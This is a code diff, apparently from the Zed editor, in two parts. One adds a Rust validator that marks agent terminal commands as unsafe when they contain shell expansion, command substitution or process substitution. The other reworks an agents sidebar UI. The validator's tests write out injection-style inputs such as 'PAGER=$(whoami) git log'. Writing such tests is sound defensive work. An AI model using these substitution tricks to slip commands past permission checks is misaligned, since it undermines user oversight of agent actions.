+ TerminalProgramValidation::Unsafe => TerminalCommandValidation::Unsafe,
+ TerminalProgramValidation::Unsupported => TerminalCommandValidation::Unsupported,
+ }
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum TerminalProgramValidation {
+ Safe,
+ Unsafe,
+ Unsupported,
+}
+
+fn first_simple_command(program: &ast::Program) -> Option<&ast::SimpleCommand> {
+ let complete_command = program.complete_commands.first()?;
+ let compound_list_item = complete_command.0.first()?;
+ let command = compound_list_item.0.first.seq.first()?;
+
+ match command {
+ ast::Command::Simple(simple_command) => Some(simple_command),
+ _ => None,
+ }
+}
+
+fn update_display_bounds(start: &mut Option<usize>, end: &mut Option<usize>, word: &ast::Word) {
+ if let Some(location) = word.location() {
+ let word_start = location.start.index;
+ let word_end = location.end.index;
+ *start = Some(start.map_or(word_start, |current| current.min(word_start)));
+ *end = Some(end.map_or(word_end, |current| current.max(word_end)));
+ }
+}
+
+enum NormalizedAssignment {
+ Included(String),
+ Skipped,
+}
+
+fn normalize_assignment_for_command_prefix(
+ assignment: &ast::Assignment,
+ word: &ast::Word,
+) -> Option<NormalizedAssignment> {
+ let operator = if assignment.append { "+=" } else { "=" };
+ let assignment_prefix = format!("{}{}", assignment.name, operator);
+
+ match &assignment.value {
+ ast::AssignmentValue::Scalar(value) => {
+ let normalized_value = normalize_word(value)?;
+ let raw_value = word.value.strip_prefix(&assignment_prefix)?;
+ let rendered_value = if shell_value_requires_quoting(&normalized_value) {
+ raw_value.to_string()
+ } else {
+ normalized_value
+ };
+
+ Some(NormalizedAssignment::Included(format!(
+ "{assignment_prefix}{rendered_value}"
+ )))
+ }
+ ast::AssignmentValue::Array(_) => Some(NormalizedAssignment::Skipped),
+ }
+}
+
+fn shell_value_requires_quoting(value: &str) -> bool {
+ value.chars().any(|character| {
+ character.is_whitespace()
+ || !matches!(
+ character,
+ 'a'..='z'
+ | 'A'..='Z'
+ | '0'..='9'
+ | '_'
+ | '@'
+ | '%'
+ | '+'
+ | '='
+ | ':'
+ | ','
+ | '.'
+ | '/'
+ | '-'
+ )
+ })
+}
+
+fn program_validation(program: &ast::Program) -> TerminalProgramValidation {
+ combine_validations(
+ program
+ .complete_commands
+ .iter()
+ .map(compound_list_validation),
+ )
+}
+
+fn compound_list_validation(compound_list: &ast::CompoundList) -> TerminalProgramValidation {
+ combine_validations(
+ compound_list
+ .0
+ .iter()
+ .map(|item| and_or_list_validation(&item.0)),
+ )
+}
+
+fn and_or_list_validation(and_or_list: &ast::AndOrList) -> TerminalProgramValidation {
+ combine_validations(
+ std::iter::once(pipeline_validation(&and_or_list.first)).chain(
+ and_or_list.additional.iter().map(|and_or| match and_or {
+ ast::AndOr::And(pipeline) | ast::AndOr::Or(pipeline) => {
+ pipeline_validation(pipeline)
+ }
+ }),
+ ),
+ )
+}
+
+fn pipeline_validation(pipeline: &ast::Pipeline) -> TerminalProgramValidation {
+ combine_validations(pipeline.seq.iter().map(command_validation))
+}
+
+fn command_validation(command: &ast::Command) -> TerminalProgramValidation {
+ match command {
+ ast::Command::Simple(simple_command) => simple_command_validation(simple_command),
+ ast::Command::Compound(compound_command, redirect_list) => combine_validations(
+ std::iter::once(compound_command_validation(compound_command))
+ .chain(redirect_list.iter().map(redirect_list_validation)),
+ ),
+ ast::Command::Function(function_definition) => {
+ function_body_validation(&function_definition.body)
+ }
+ ast::Command::ExtendedTest(test_expr) => extended_test_expr_validation(test_expr),
+ }
+}
+
+fn simple_command_validation(simple_command: &ast::SimpleCommand) -> TerminalProgramValidation {
+ combine_validations(
+ simple_command
+ .prefix
+ .iter()
+ .map(command_prefix_validation)
+ .chain(simple_command.word_or_name.iter().map(word_validation))
+ .chain(simple_command.suffix.iter().map(command_suffix_validation)),
+ )
+}
+
+fn command_prefix_validation(prefix: &ast::CommandPrefix) -> TerminalProgramValidation {
+ combine_validations(prefix.0.iter().map(prefix_or_suffix_item_validation))
+}
+
+fn command_suffix_validation(suffix: &ast::CommandSuffix) -> TerminalProgramValidation {
+ combine_validations(suffix.0.iter().map(prefix_or_suffix_item_validation))
+}
+
+fn prefix_or_suffix_item_validation(
+ item: &ast::CommandPrefixOrSuffixItem,
+) -> TerminalProgramValidation {
+ match item {
+ ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => io_redirect_validation(redirect),
+ ast::CommandPrefixOrSuffixItem::Word(word) => word_validation(word),
+ ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => {
+ combine_validations([assignment_validation(assignment), word_validation(word)])
+ }
+ ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {
+ TerminalProgramValidation::Unsafe
+ }
+ }
+}
+
+fn io_redirect_validation(redirect: &ast::IoRedirect) -> TerminalProgramValidation {
+ match redirect {
+ ast::IoRedirect::File(_, _, target) => match target {
+ ast::IoFileRedirectTarget::Filename(word) => word_validation(word),
+ ast::IoFileRedirectTarget::ProcessSubstitution(_, _) => {
+ TerminalProgramValidation::Unsafe
+ }
+ _ => TerminalProgramValidation::Safe,
+ },
+ ast::IoRedirect::HereDocument(_, here_doc) => {
+ if here_doc.requires_expansion {
+ word_validation(&here_doc.doc)
+ } else {
+ TerminalProgramValidation::Safe
+ }
+ }
+ ast::IoRedirect::HereString(_, word) | ast::IoRedirect::OutputAndError(word, _) => {
+ word_validation(word)
+ }
+ }
+}
+
+fn assignment_validation(assignment: &ast::Assignment) -> TerminalProgramValidation {
+ match &assignment.value {
+ ast::AssignmentValue::Scalar(word) => word_validation(word),
+ ast::AssignmentValue::Array(words) => {
+ combine_validations(words.iter().flat_map(|(key, value)| {
+ key.iter()
+ .map(word_validation)
+ .chain(std::iter::once(word_validation(value)))
+ }))
+ }
+ }
+}
+
+fn word_validation(word: &ast::Word) -> TerminalProgramValidation {
+ let options = ParserOptions::default();
+ let pieces = match brush_parser::word::parse(&word.value, &options) {
+ Ok(pieces) => pieces,
+ Err(_) => return TerminalProgramValidation::Unsupported,
+ };
+
+ combine_validations(
+ pieces
+ .iter()
+ .map(|piece_with_source| word_piece_validation(&piece_with_source.piece)),
+ )
+}
+
+fn word_piece_validation(piece: &WordPiece) -> TerminalProgramValidation {
+ match piece {
+ WordPiece::Text(_)
+ | WordPiece::SingleQuotedText(_)
+ | WordPiece::AnsiCQuotedText(_)
+ | WordPiece::EscapeSequence(_)
+ | WordPiece::TildePrefix(_) => TerminalProgramValidation::Safe,
+ WordPiece::DoubleQuotedSequence(pieces)
+ | WordPiece::GettextDoubleQuotedSequence(pieces) => combine_validations(
+ pieces
+ .iter()
+ .map(|inner| word_piece_validation(&inner.piece)),
+ ),
+ WordPiece::ParameterExpansion(_) | WordPiece::ArithmeticExpression(_) => {
+ TerminalProgramValidation::Unsafe
+ }
+ WordPiece::CommandSubstitution(command)
+ | WordPiece::BackquotedCommandSubstitution(command) => {
+ let reader = BufReader::new(command.as_bytes());
+ let options = ParserOptions::default();
+ let source_info = SourceInfo::default();
+ let mut parser = Parser::new(reader, &options, &source_info);
+
+ match parser.parse_program() {
+ Ok(_) => TerminalProgramValidation::Unsafe,
+ Err(_) => TerminalProgramValidation::Unsupported,
+ }
+ }
+ }
+}
+
+fn compound_command_validation(
+ compound_command: &ast::CompoundCommand,
+) -> TerminalProgramValidation {
+ match compound_command {
+ ast::CompoundCommand::BraceGroup(brace_group) => {
+ compound_list_validation(&brace_group.list)
+ }
+ ast::CompoundCommand::Subshell(subshell) => compound_list_validation(&subshell.list),
+ ast::CompoundCommand::ForClause(for_clause) => combine_validations(
+ for_clause
+ .values
+ .iter()
+ .flat_map(|values| values.iter().map(word_validation))
+ .chain(std::iter::once(do_group_validation(&for_clause.body))),
+ ),
+ ast::CompoundCommand::CaseClause(case_clause) => combine_validations(
+ std::iter::once(word_validation(&case_clause.value))
+ .chain(
+ case_clause
+ .cases
+ .iter()
+ .flat_map(|item| item.cmd.iter().map(compound_list_validation)),
+ )
+ .chain(
+ case_clause
+ .cases
+ .iter()
+ .flat_map(|item| item.patterns.iter().map(word_validation)),
+ ),
+ ),
+ ast::CompoundCommand::IfClause(if_clause) => combine_validations(
+ std::iter::once(compound_list_validation(&if_clause.condition))
+ .chain(std::iter::once(compound_list_validation(&if_clause.then)))
+ .chain(if_clause.elses.iter().flat_map(|elses| {
+ elses.iter().flat_map(|else_item| {
+ else_item
+ .condition
+ .iter()
+ .map(compound_list_validation)
+ .chain(std::iter::once(compound_list_validation(&else_item.body)))
+ })
+ })),
+ ),
+ ast::CompoundCommand::WhileClause(while_clause)
+ | ast::CompoundCommand::UntilClause(while_clause) => combine_validations([
+ compound_list_validation(&while_clause.0),
+ do_group_validation(&while_clause.1),
+ ]),
+ ast::CompoundCommand::ArithmeticForClause(_) => TerminalProgramValidation::Unsafe,
+ ast::CompoundCommand::Arithmetic(_) => TerminalProgramValidation::Unsafe,
+ }
+}
+
+fn do_group_validation(do_group: &ast::DoGroupCommand) -> TerminalProgramValidation {
+ compound_list_validation(&do_group.list)
+}
+
+fn function_body_validation(function_body: &ast::FunctionBody) -> TerminalProgramValidation {
+ combine_validations(
+ std::iter::once(compound_command_validation(&function_body.0))
+ .chain(function_body.1.iter().map(redirect_list_validation)),
+ )
+}
+
+fn redirect_list_validation(redirect_list: &ast::RedirectList) -> TerminalProgramValidation {
+ combine_validations(redirect_list.0.iter().map(io_redirect_validation))
+}
+
+fn extended_test_expr_validation(
+ test_expr: &ast::ExtendedTestExprCommand,
+) -> TerminalProgramValidation {
+ extended_test_expr_inner_validation(&test_expr.expr)
+}
+
+fn extended_test_expr_inner_validation(expr: &ast::ExtendedTestExpr) -> TerminalProgramValidation {
+ match expr {
+ ast::ExtendedTestExpr::Not(inner) | ast::ExtendedTestExpr::Parenthesized(inner) => {
+ extended_test_expr_inner_validation(inner)
+ }
+ ast::ExtendedTestExpr::And(left, right) | ast::ExtendedTestExpr::Or(left, right) => {
+ combine_validations([
+ extended_test_expr_inner_validation(left),
+ extended_test_expr_inner_validation(right),
+ ])
+ }
+ ast::ExtendedTestExpr::UnaryTest(_, word) => word_validation(word),
+ ast::ExtendedTestExpr::BinaryTest(_, left, right) => {
+ combine_validations([word_validation(left), word_validation(right)])
+ }
+ }
+}
+
+fn combine_validations(
+ validations: impl IntoIterator<Item = TerminalProgramValidation>,
+) -> TerminalProgramValidation {
+ let mut saw_unsafe = false;
+ let mut saw_unsupported = false;
+
+ for validation in validations {
+ match validation {
+ TerminalProgramValidation::Unsupported => saw_unsupported = true,
+ TerminalProgramValidation::Unsafe => saw_unsafe = true,
+ TerminalProgramValidation::Safe => {}
+ }
+ }
+
+ if saw_unsafe {
+ TerminalProgramValidation::Unsafe
+ } else if saw_unsupported {
+ TerminalProgramValidation::Unsupported
+ } else {
+ TerminalProgramValidation::Safe
+ }
+}
+
fn extract_commands_from_program(program: &ast::Program, commands: &mut Vec<String>) -> Option<()> {
for complete_command in &program.complete_commands {
extract_commands_from_compound_list(complete_command, commands)?;
@@ -117,12 +572,26 @@ fn extract_commands_from_simple_command(
if let Some(prefix) = &simple_command.prefix {
for item in &prefix.0 {
- if let ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) = item {
- match normalize_io_redirect(redirect) {
- Some(RedirectNormalization::Normalized(s)) => redirects.push(s),
- Some(RedirectNormalization::Skip) => {}
- None => return None,
+ match item {
+ ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => {
+ match normalize_io_redirect(redirect) {
+ Some(RedirectNormalization::Normalized(s)) => redirects.push(s),
+ Some(RedirectNormalization::Skip) => {}
+ None => return None,
+ }
+ }
+ ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => {
+ match normalize_assignment_for_command_prefix(assignment, word)? {
+ NormalizedAssignment::Included(normalized_assignment) => {
+ words.push(normalized_assignment);
+ }
+ NormalizedAssignment::Skipped => {}
+ }
+ }
+ ast::CommandPrefixOrSuffixItem::Word(word) => {
+ words.push(normalize_word(word)?);
}
+ ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => return None,
}
}
}
@@ -142,7 +611,15 @@ fn extract_commands_from_simple_command(
None => return None,
}
}
- _ => {}
+ ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => {
+ match normalize_assignment_for_command_prefix(assignment, word)? {
+ NormalizedAssignment::Included(normalized_assignment) => {
+ words.push(normalized_assignment);
+ }
+ NormalizedAssignment::Skipped => {}
+ }
+ }
+ ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {}
}
}
}
@@ -1061,4 +1538,220 @@ mod tests {
let commands = extract_commands("cmd > /tmp/out 2>/dev/null").expect("parse failed");
assert_eq!(commands, vec!["cmd", "> /tmp/out"]);
}
+
+ #[test]
+ fn test_scalar_env_var_prefix_included_in_extracted_command() {
+ let commands = extract_commands("PAGER=blah git status").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER=blah git status"]);
+ }
+
+ #[test]
+ fn test_multiple_scalar_assignments_preserved_in_order() {
+ let commands = extract_commands("A=1 B=2 git log").expect("parse failed");
+ assert_eq!(commands, vec!["A=1 B=2 git log"]);
+ }
+
+ #[test]
+ fn test_assignment_quoting_dropped_when_safe() {
+ let commands = extract_commands("PAGER='curl' git log").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER=curl git log"]);
+ }
+
+ #[test]
+ fn test_assignment_quoting_preserved_for_whitespace() {
+ let commands = extract_commands("PAGER='less -R' git log").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER='less -R' git log"]);
+ }
+
+ #[test]
+ fn test_assignment_quoting_preserved_for_semicolon() {
+ let commands = extract_commands("PAGER='a;b' git log").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER='a;b' git log"]);
+ }
+
+ #[test]
+ fn test_array_assignments_ignored_for_prefix_matching_output() {
+ let commands = extract_commands("FOO=(a b) git status").expect("parse failed");
+ assert_eq!(commands, vec!["git status"]);
+ }
+
+ #[test]
+ fn test_extract_terminal_command_prefix_includes_env_var_prefix_and_subcommand() {
+ let prefix = extract_terminal_command_prefix("PAGER=blah git log --oneline")
+ .expect("expected terminal command prefix");
+
+ assert_eq!(
+ prefix,
+ TerminalCommandPrefix {
+ normalized: "PAGER=blah git log".to_string(),
+ display: "PAGER=blah git log".to_string(),
+ tokens: vec![
+ "PAGER=blah".to_string(),
+ "git".to_string(),
+ "log".to_string(),
+ ],
+ command: "git".to_string(),
+ subcommand: Some("log".to_string()),
+ }
+ );
+ }
+
+ #[test]
+ fn test_extract_terminal_command_prefix_preserves_required_assignment_quotes_in_display_and_normalized()
+ {
+ let prefix = extract_terminal_command_prefix("PAGER='less -R' git log")
+ .expect("expected terminal command prefix");
+
+ assert_eq!(
+ prefix,
+ TerminalCommandPrefix {
+ normalized: "PAGER='less -R' git log".to_string(),
+ display: "PAGER='less -R' git log".to_string(),
+ tokens: vec![
+ "PAGER='less -R'".to_string(),
+ "git".to_string(),
+ "log".to_string(),
+ ],
+ command: "git".to_string(),
+ subcommand: Some("log".to_string()),
+ }
+ );
+ }
+
+ #[test]
+ fn test_extract_terminal_command_prefix_skips_redirects_before_subcommand() {
+ let prefix = extract_terminal_command_prefix("git 2>/dev/null log --oneline")
+ .expect("expected terminal command prefix");
+
+ assert_eq!(
+ prefix,
+ TerminalCommandPrefix {
+ normalized: "git log".to_string(),
+ display: "git 2>/dev/null log".to_string(),
+ tokens: vec!["git".to_string(), "log".to_string()],
+ command: "git".to_string(),
+ subcommand: Some("log".to_string()),
+ }
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_parameter_expansion() {
+ assert_eq!(
+ validate_terminal_command("echo $HOME"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_braced_parameter_expansion() {
+ assert_eq!(
+ validate_terminal_command("echo ${HOME}"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_special_parameters() {
+ assert_eq!(
+ validate_terminal_command("echo $?"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("echo $$"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("echo $@"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_command_substitution() {
+ assert_eq!(
+ validate_terminal_command("echo $(whoami)"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_backticks() {
+ assert_eq!(
+ validate_terminal_command("echo `whoami`"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_arithmetic_expansion() {
+ assert_eq!(
+ validate_terminal_command("echo $((1 + 1))"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_process_substitution() {
+ assert_eq!(
+ validate_terminal_command("cat <(ls)"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("ls >(cat)"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_forbidden_constructs_in_env_var_assignments() {
+ assert_eq!(
+ validate_terminal_command("PAGER=$HOME git log"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("PAGER=$(whoami) git log"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_returns_unsupported_for_parse_failure() {
+ assert_eq!(
+ validate_terminal_command("echo $(ls &&)"),
+ TerminalCommandValidation::Unsupported
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_substitution_in_case_pattern() {
+ assert_ne!(
+ validate_terminal_command("case x in $(echo y)) echo z;; esac"),
+ TerminalCommandValidation::Safe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_safe_case_clause_without_substitutions() {
+ assert_eq!(
+ validate_terminal_command("case x in foo) echo hello;; esac"),
+ TerminalCommandValidation::Safe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_substitution_in_arithmetic_for_clause() {
+ assert_ne!(
+ validate_terminal_command("for ((i=$(echo 0); i<3; i++)); do echo hello; done"),
+ TerminalCommandValidation::Safe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_arithmetic_for_clause_unconditionally() {
+ assert_eq!(
+ validate_terminal_command("for ((i=0; i<3; i++)); do echo hello; done"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
}
@@ -16,13 +16,16 @@ default = []
[dependencies]
acp_thread.workspace = true
+action_log.workspace = true
agent.workspace = true
agent-client-protocol.workspace = true
agent_ui.workspace = true
+anyhow.workspace = true
chrono.workspace = true
editor.workspace = true
feature_flags.workspace = true
fs.workspace = true
+git.workspace = true
gpui.workspace = true
menu.workspace = true
project.workspace = true
@@ -31,6 +34,7 @@ settings.workspace = true
theme.workspace = true
ui.workspace = true
util.workspace = true
+vim_mode_setting.workspace = true
workspace.workspace = true
zed_actions.workspace = true
@@ -41,10 +45,14 @@ agent_ui = { workspace = true, features = ["test-support"] }
assistant_text_thread = { workspace = true, features = ["test-support"] }
editor.workspace = true
language_model = { workspace = true, features = ["test-support"] }
+pretty_assertions.workspace = true
+prompt_store.workspace = true
+recent_projects = { workspace = true, features = ["test-support"] }
serde_json.workspace = true
feature_flags.workspace = true
fs = { workspace = true, features = ["test-support"] }
+git.workspace = true
gpui = { workspace = true, features = ["test-support"] }
project = { workspace = true, features = ["test-support"] }
settings = { workspace = true, features = ["test-support"] }
-workspace = { workspace = true, features = ["test-support"] }
+workspace = { workspace = true, features = ["test-support"] }
@@ -1,51 +1,72 @@
use acp_thread::ThreadStatus;
-use agent::ThreadStore;
-use agent_client_protocol as acp;
-use agent_ui::{AgentPanel, AgentPanelEvent, NewThread};
+use action_log::DiffStats;
+use agent_client_protocol::{self as acp};
+use agent_ui::thread_metadata_store::{SidebarThreadMetadataStore, ThreadMetadata};
+use agent_ui::threads_archive_view::{
+ ThreadsArchiveView, ThreadsArchiveViewEvent, format_history_entry_timestamp,
+};
+use agent_ui::{
+ Agent, AgentPanel, AgentPanelEvent, DEFAULT_THREAD_TITLE, NewThread, RemoveSelectedThread,
+};
use chrono::Utc;
-use editor::{Editor, EditorElement, EditorStyle};
+use editor::Editor;
use feature_flags::{AgentV2FeatureFlag, FeatureFlagViewExt as _};
use gpui::{
- AnyElement, App, Context, Entity, EventEmitter, FocusHandle, Focusable, FontStyle, ListState,
- Pixels, Render, SharedString, TextStyle, WeakEntity, Window, actions, list, prelude::*, px,
- relative, rems,
+ Action as _, AnyElement, App, Context, Entity, FocusHandle, Focusable, ListState, Pixels,
+ Render, SharedString, WeakEntity, Window, WindowHandle, list, prelude::*, px,
};
-use menu::{Cancel, Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious};
-use project::Event as ProjectEvent;
-use recent_projects::RecentProjects;
-use settings::Settings;
+use menu::{
+ Cancel, Confirm, SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious,
+};
+use project::{AgentId, Event as ProjectEvent, linked_worktree_short_name};
+use recent_projects::sidebar_recent_projects::SidebarRecentProjects;
+use ui::utils::platform_title_bar_height;
+
+use settings::Settings as _;
use std::collections::{HashMap, HashSet};
use std::mem;
-use theme::{ActiveTheme, ThemeSettings};
-use ui::utils::TRAFFIC_LIGHT_PADDING;
+use std::path::Path;
+use std::rc::Rc;
+use std::sync::Arc;
+use theme::ActiveTheme;
use ui::{
- AgentThreadStatus, ButtonStyle, GradientFade, HighlightedLabel, IconButtonShape, KeyBinding,
- ListItem, PopoverMenu, PopoverMenuHandle, Tab, ThreadItem, TintColor, Tooltip, WithScrollbar,
- prelude::*,
+ AgentThreadStatus, CommonAnimationExt, ContextMenu, Divider, HighlightedLabel, KeyBinding,
+ PopoverMenu, PopoverMenuHandle, Tab, ThreadItem, TintColor, Tooltip, WithScrollbar, prelude::*,
};
+use util::ResultExt as _;
use util::path_list::PathList;
use workspace::{
- FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent, Sidebar as WorkspaceSidebar,
- SidebarEvent, ToggleWorkspaceSidebar, Workspace,
+ AddFolderToProject, FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent, Open,
+ Sidebar as WorkspaceSidebar, ToggleWorkspaceSidebar, Workspace, WorkspaceId,
};
+
use zed_actions::OpenRecent;
use zed_actions::editor::{MoveDown, MoveUp};
-actions!(
+use zed_actions::agents_sidebar::FocusSidebarFilter;
+
+gpui::actions!(
agents_sidebar,
[
- /// Collapses the selected entry in the workspace sidebar.
- CollapseSelectedEntry,
- /// Expands the selected entry in the workspace sidebar.
- ExpandSelectedEntry,
+ /// Creates a new thread in the currently selected or active project group.
+ NewThreadInGroup,
+ /// Toggles between the thread list and the archive view.
+ ToggleArchive,
]
);
-const DEFAULT_WIDTH: Pixels = px(320.0);
+const DEFAULT_WIDTH: Pixels = px(300.0);
const MIN_WIDTH: Pixels = px(200.0);
const MAX_WIDTH: Pixels = px(800.0);
const DEFAULT_THREADS_SHOWN: usize = 5;
+#[derive(Debug, Default)]
+enum SidebarView {
+ #[default]
+ ThreadList,
+ Archive(Entity<ThreadsArchiveView>),
+}
+
#[derive(Clone, Debug)]
struct ActiveThreadInfo {
session_id: acp::SessionId,
@@ -54,30 +75,45 @@ struct ActiveThreadInfo {
icon: IconName,
icon_from_external_svg: Option<SharedString>,
is_background: bool,
+ is_title_generating: bool,
+ diff_stats: DiffStats,
}
impl From<&ActiveThreadInfo> for acp_thread::AgentSessionInfo {
fn from(info: &ActiveThreadInfo) -> Self {
Self {
session_id: info.session_id.clone(),
- cwd: None,
+ work_dirs: None,
title: Some(info.title.clone()),
updated_at: Some(Utc::now()),
+ created_at: Some(Utc::now()),
meta: None,
}
}
}
+#[derive(Clone)]
+enum ThreadEntryWorkspace {
+ Open(Entity<Workspace>),
+ Closed(PathList),
+}
+
#[derive(Clone)]
struct ThreadEntry {
+ agent: Agent,
session_info: acp_thread::AgentSessionInfo,
icon: IconName,
icon_from_external_svg: Option<SharedString>,
status: AgentThreadStatus,
- workspace: Entity<Workspace>,
+ workspace: ThreadEntryWorkspace,
is_live: bool,
is_background: bool,
+ is_title_generating: bool,
highlight_positions: Vec<usize>,
+ worktree_name: Option<SharedString>,
+ worktree_full_path: Option<SharedString>,
+ worktree_highlight_positions: Vec<usize>,
+ diff_stats: DiffStats,
}
#[derive(Clone)]
@@ -87,17 +123,19 @@ enum ListEntry {
label: SharedString,
workspace: Entity<Workspace>,
highlight_positions: Vec<usize>,
- has_threads: bool,
+ has_running_threads: bool,
+ waiting_thread_count: usize,
+ is_active: bool,
},
Thread(ThreadEntry),
ViewMore {
path_list: PathList,
- remaining_count: usize,
is_fully_expanded: bool,
},
NewThread {
path_list: PathList,
workspace: Entity<Workspace>,
+ is_active_draft: bool,
},
}
@@ -111,6 +149,8 @@ impl From<ThreadEntry> for ListEntry {
struct SidebarContents {
entries: Vec<ListEntry>,
notified_threads: HashSet<acp::SessionId>,
+ project_header_indices: Vec<usize>,
+ has_open_projects: bool,
}
impl SidebarContents {
@@ -141,36 +181,55 @@ fn fuzzy_match_positions(query: &str, candidate: &str) -> Option<Vec<usize>> {
}
}
-fn workspace_path_list_and_label(
+// TODO: The mapping from workspace root paths to git repositories needs a
+// unified approach across the codebase: this function, `AgentPanel::classify_worktrees`,
+// thread persistence (which PathList is saved to the database), and thread
+// querying (which PathList is used to read threads back). All of these need
+// to agree on how repos are resolved for a given workspace, especially in
+// multi-root and nested-repo configurations.
+fn root_repository_snapshots(
workspace: &Entity<Workspace>,
cx: &App,
-) -> (PathList, SharedString) {
- let workspace_ref = workspace.read(cx);
- let mut paths = Vec::new();
- let mut names = Vec::new();
-
- for worktree in workspace_ref.worktrees(cx) {
- let worktree_ref = worktree.read(cx);
- if !worktree_ref.is_visible() {
- continue;
- }
- let abs_path = worktree_ref.abs_path();
- paths.push(abs_path.to_path_buf());
+) -> Vec<project::git_store::RepositorySnapshot> {
+ let path_list = workspace_path_list(workspace, cx);
+ let project = workspace.read(cx).project().read(cx);
+ project
+ .repositories(cx)
+ .values()
+ .filter_map(|repo| {
+ let snapshot = repo.read(cx).snapshot();
+ let is_root = path_list
+ .paths()
+ .iter()
+ .any(|p| p.as_path() == snapshot.work_directory_abs_path.as_ref());
+ is_root.then_some(snapshot)
+ })
+ .collect()
+}
+
+fn workspace_path_list(workspace: &Entity<Workspace>, cx: &App) -> PathList {
+ PathList::new(&workspace.read(cx).root_paths(cx))
+}
+
+fn workspace_label_from_path_list(path_list: &PathList) -> SharedString {
+ let mut names = Vec::with_capacity(path_list.paths().len());
+ for abs_path in path_list.paths() {
if let Some(name) = abs_path.file_name() {
names.push(name.to_string_lossy().to_string());
}
}
-
- let label: SharedString = if names.is_empty() {
+ if names.is_empty() {
// TODO: Can we do something better in this case?
"Empty Workspace".into()
} else {
names.join(", ").into()
- };
-
- (PathList::new(&paths), label)
+ }
}
+/// The sidebar re-derives its entire entry list from scratch on every
+/// change via `update_entries` → `rebuild_contents`. Avoid adding
+/// incremental or inter-event coordination state — if something can
+/// be computed from the current world state, compute it in the rebuild.
pub struct Sidebar {
multi_workspace: WeakEntity<MultiWorkspace>,
width: Pixels,
@@ -182,15 +241,23 @@ pub struct Sidebar {
///
/// Note: This is NOT the same as the active item.
selection: Option<usize>,
+ /// Derived from the active panel's thread in `rebuild_contents`.
+ /// Only updated when the panel returns `Some` — never cleared by
+ /// derivation, since the panel may transiently return `None` while
+ /// loading. User actions may write directly for immediate feedback.
focused_thread: Option<acp::SessionId>,
- active_entry_index: Option<usize>,
+ agent_panel_visible: bool,
+ active_thread_is_draft: bool,
+ hovered_thread_index: Option<usize>,
collapsed_groups: HashSet<PathList>,
expanded_groups: HashMap<PathList, usize>,
- recent_projects_popover_handle: PopoverMenuHandle<RecentProjects>,
+ view: SidebarView,
+ recent_projects_popover_handle: PopoverMenuHandle<SidebarRecentProjects>,
+ project_header_menu_ix: Option<usize>,
+ _subscriptions: Vec<gpui::Subscription>,
+ _draft_observation: Option<gpui::Subscription>,
}
-impl EventEmitter<SidebarEvent> for Sidebar {}
-
impl Sidebar {
pub fn new(
multi_workspace: Entity<MultiWorkspace>,
@@ -203,6 +270,7 @@ impl Sidebar {
let filter_editor = cx.new(|cx| {
let mut editor = Editor::single_line(window, cx);
+ editor.set_use_modal_editing(true);
editor.set_placeholder_text("Search…", window, cx);
editor
});
@@ -212,7 +280,7 @@ impl Sidebar {
window,
|this, _multi_workspace, event: &MultiWorkspaceEvent, window, cx| match event {
MultiWorkspaceEvent::ActiveWorkspaceChanged => {
- this.focused_thread = None;
+ this.observe_draft_editor(cx);
this.update_entries(cx);
}
MultiWorkspaceEvent::WorkspaceAdded(workspace) => {
@@ -234,27 +302,18 @@ impl Sidebar {
}
this.update_entries(cx);
if !query.is_empty() {
- this.selection = this
- .contents
- .entries
- .iter()
- .position(|entry| matches!(entry, ListEntry::Thread(_)))
- .or_else(|| {
- if this.contents.entries.is_empty() {
- None
- } else {
- Some(0)
- }
- });
+ this.select_first_entry();
}
}
})
.detach();
- let thread_store = ThreadStore::global(cx);
- cx.observe_in(&thread_store, window, |this, _, _window, cx| {
- this.update_entries(cx);
- })
+ cx.observe(
+ &SidebarThreadMetadataStore::global(cx),
+ |this, _store, cx| {
+ this.update_entries(cx);
+ },
+ )
.detach();
cx.observe_flag::<AgentV2FeatureFlag, _>(window, |_is_enabled, this, _window, cx| {
@@ -279,15 +338,27 @@ impl Sidebar {
contents: SidebarContents::default(),
selection: None,
focused_thread: None,
- active_entry_index: None,
+ agent_panel_visible: false,
